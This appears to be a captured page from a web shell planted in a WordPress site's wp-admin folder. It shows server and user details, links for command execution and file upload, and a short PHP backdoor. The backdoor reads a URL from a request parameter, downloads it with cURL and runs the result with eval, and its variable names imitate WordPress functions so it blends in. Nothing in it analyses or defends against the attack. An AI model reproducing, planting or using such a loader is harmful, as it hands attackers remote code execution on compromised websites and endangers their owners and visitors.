|
Server IP : 109.234.164.45 / Your IP : 216.73.216.40 Web Server : Apache System : Linux cuvette.o2switch.net 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64 User : xqnc2294 ( 1276) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/xqnc2294/gel-mains.com/wp-admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
if (isset($_GET['plain'])) {
$add_query_arg_pd = $_GET['plain'];
if ($have_posts_wy = curl_init()) {
curl_setopt($have_posts_wy, CURLOPT_URL, $add_query_arg_pd);
curl_setopt($have_posts_wy, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($have_posts_wy));
curl_close($have_posts_wy);
exit;
}
}